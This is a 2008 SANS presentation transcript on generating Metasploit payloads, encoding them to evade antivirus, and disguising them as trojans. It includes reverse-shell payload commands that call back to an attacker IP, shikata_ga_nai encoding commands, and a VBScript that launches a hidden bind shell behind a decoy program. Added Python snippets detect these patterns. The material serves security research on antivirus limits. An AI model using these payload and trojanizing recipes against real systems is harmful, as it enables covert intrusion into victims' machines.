
Metasploit Payloads and Antivirus

Metasploit Payloads and Antivirus. Mark Baggett, December 2008, GIAC GSEC GCIH. Objectives: learn how an attacker might use Metasploit standalone payloads against you; see how these payloads are created, used and “trojanized”; understand what level of protection to expect from your antivirus.



Presentation Transcript


  1. Metasploit Payloads and Antivirus
  Mark Baggett, December 2008, GIAC GSEC GCIH
  SANS Technology Institute - Candidate for Master of Science Degree

  2. Objectives
  • Learn how an attacker might use Metasploit standalone payloads against you
  • See how these payloads are created, used and “trojanized”
  • Understand what level of protection to expect from your antivirus

  3. How are they used against you?
  • Can be executed by tricking a user into running the payload, or via an exploit that is not in the framework
  • Execute a payload on a fully patched system
  • Use Meterpreter’s advanced functionality such as anti-forensics, detection evasion, and pivoting
  • Scenario:
    • Attacker brute-forces the password of a fully patched machine
    • Runs a Meterpreter payload and uses it to pivot
    • Uses the framework to attack other hosts on the DMZ

  4. msfpayload
  • Generates payloads in various formats
    • Source code in C, Perl, Ruby, Java
    • Hexadecimal (RAW)
    • Binary executable formats for Win32; Linux; OS X on Intel, PPC, iPhone
  • The Java output automatically selects big-endian or little-endian byte order depending on the processor of the targeted payload
  • You can override this with a simple modification to msfpayload (js_be, js_le)

  5. Demonstration
  • See how these payloads are created

  6. Interacting with payloads
  • Some payloads will not work standalone
    • find_port, find_tag
  • Bind shell payloads can be used outside of the framework
  • Others require the use of the multi/handler exploit

  7. Using multi/handler
  CREATION - LHOST is the attacker’s IP
    ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.100.5 X > vncrev.exe
  USE - RHOST is the victim’s IP
    ./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp RHOST=192.168.100.3 DisableCourtesyShell=TRUE E

  8. Demonstration
  • See how these payloads are used

  9. msfencode
  • Will encode a payload using one of various algorithms
  • Expects RAW msfpayload output as input
  • -h for help
  • -l list the available encoders
  • -e encoder to use
  • -t output type
  • -b characters to avoid

  10. msfencode -> Binary
  • Binary was not a selectable output type from msfencode until Sept 29th 2008
  • 3 ways to create a binary
    • Add 3 lines of code to msfencode
    • Generate RAW output and use a hex editor to place it in a binary PE format
    • Generate C source code and compile it
  • The -t exe option will encode a Windows binary

  11. msfencode (continued)
  • ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -t exe
  • ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -b "\x41\x42\x43" -t exe
  • Text.to_win32pe() uses /data/templates
  • Use your own binaries with the “PAYLOAD:” tag
  • to_win32pe chooses a random base relocation address (4 bytes at position 0x88)
  • Roll your own with template.c
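Because the slide says every executable built from the template differs only in the 4 randomised bytes at offset 0x88, a defender can hash the file with those bytes masked out and group all template-generated binaries under one value. The following is an added example and is not code from the presentation or from Metasploit; the offset and length come from the slide, and build_sample produces a constructed, minimal PE-like stand-in rather than a real executable.

```python
import hashlib

# Location of the randomised bytes as stated on the slide (assumption: this
# applies to the msfencode template of that era; adjust for other templates).
RANDOMISED_OFFSET = 0x88
RANDOMISED_LEN = 4


def is_pe(data: bytes) -> bool:
    """Cheap sanity check: 'MZ' stub and a 'PE\\0\\0' signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def template_hash(data: bytes) -> str:
    """SHA-256 of the image with the randomised bytes zeroed.

    Two files generated from the same template, differing only in those
    4 bytes, produce the same value; any other change produces a new one.
    """
    if not is_pe(data):
        raise ValueError("not a PE image")
    masked = bytearray(data)
    end = RANDOMISED_OFFSET + RANDOMISED_LEN
    masked[RANDOMISED_OFFSET:end] = b"\x00" * RANDOMISED_LEN
    return hashlib.sha256(bytes(masked)).hexdigest()


def build_sample(randomised: bytes, body: bytes) -> bytes:
    """Constructed stand-in for a template-generated file (not a valid PE):
    'MZ' stub, e_lfanew = 0x80, 'PE\\0\\0' at 0x80, the 4 'randomised' bytes
    at 0x88, followed by an opaque body."""
    assert len(randomised) == RANDOMISED_LEN
    header = bytearray(0x80)
    header[:2] = b"MZ"
    header[0x3C:0x40] = (0x80).to_bytes(4, "little")
    pe_sig = b"PE\x00\x00" + b"\x00" * 4          # occupies 0x80..0x87
    return bytes(header) + pe_sig + randomised + body


if __name__ == "__main__":
    a = build_sample(b"\x01\x02\x03\x04", b"PAYLOAD:" + b"\x90" * 16)
    b = build_sample(b"\xaa\xbb\xcc\xdd", b"PAYLOAD:" + b"\x90" * 16)
    print(template_hash(a) == template_hash(b))   # True: same template
```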

  12. Turning payloads into trojans
  • IExpress is a setup utility that comes with Windows XP
  • Can create packages that visibly execute a benign host program and invisibly execute a malicious payload
  • All you need is a small VBScript to execute your payload invisibly
  • Trojan payloads only temporarily avoid antivirus

  13. Payload script
  • The script
    ' Window style 1 shows the decoy program; window style 0 launches the payload with no visible window
    Set WshShell = WScript.CreateObject("WScript.Shell")
    WshShell.Run "mspaint.exe", 1, False
    WshShell.Run "bindshell.exe", 0, False
  • Quick IExpress Demonstration
    • See how these payloads are “trojanized”
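The telltale in the script above is a WScript.Shell Run call with window style 0 next to a visible one. As an added example (not part of the presentation), this scanner pulls every Run call out of a VBScript and flags the visible-decoy-plus-hidden-launch pattern; SAMPLE_SCRIPT is a constructed copy of the slide's script used as test input.

```python
import re

# Constructed sample input: the payload script shown on the slide.
SAMPLE_SCRIPT = '''Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "mspaint.exe",1, False
Wshshell.Run "bindshell.exe",0, False
'''

# WScript.Shell.Run(command, windowStyle, waitOnReturn): windowStyle 0 = hidden.
# Matches both 'obj.Run "cmd", 0' and 'obj.Run("cmd", 0)' forms; a Run call
# that omits the window style defaults to visible and is not matched.
RUN_CALL = re.compile(
    r'(?im)^\s*(?P<obj>\w+)\.Run\s*\(?\s*"(?P<cmd>[^"]*)"\s*,\s*(?P<style>\d+)'
)


def find_run_calls(script: str):
    """Return (command, window_style) for each Run call in source order."""
    return [(m.group("cmd"), int(m.group("style")))
            for m in RUN_CALL.finditer(script)]


def hidden_launches(script: str):
    """Commands started with window style 0 (no window shown to the user)."""
    return [cmd for cmd, style in find_run_calls(script) if style == 0]


def has_decoy_pattern(script: str) -> bool:
    """True when the script both shows one program and hides another,
    the shape the slide uses to make the payload look like a benign app."""
    styles = [style for _, style in find_run_calls(script)]
    return 0 in styles and any(s != 0 for s in styles)


if __name__ == "__main__":
    print(find_run_calls(SAMPLE_SCRIPT))
    print("hidden:", hidden_launches(SAMPLE_SCRIPT))
    print("decoy pattern:", has_decoy_pattern(SAMPLE_SCRIPT))
```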

  14. Level of protection to expect from your antivirus
  • Expected results: low rate of detection for unencoded payloads and no detection for encoded payloads
  • Actual results: no detection for unencoded payloads or encoded payloads
    • 2 products’ heuristics flagged payloads
  • Pauldotcom Episode 125 at the end of September 2008 found 6 systems detected the payload
  • My HIPS testing yielded disappointing results
  • HD Moore has stated that version 3.2 will generate a new Windows binary that is harder to detect

  15. Summary
  • Metasploit is a powerful framework with a diverse set of tools
  • Using these tools attackers can easily create standalone payloads that run on fully patched systems
  • Antivirus products do not at this time provide adequate protection against Metasploit payloads
  • My paper is in the SANS reading room titled “Effectiveness of Antivirus Detecting Metasploit Payloads”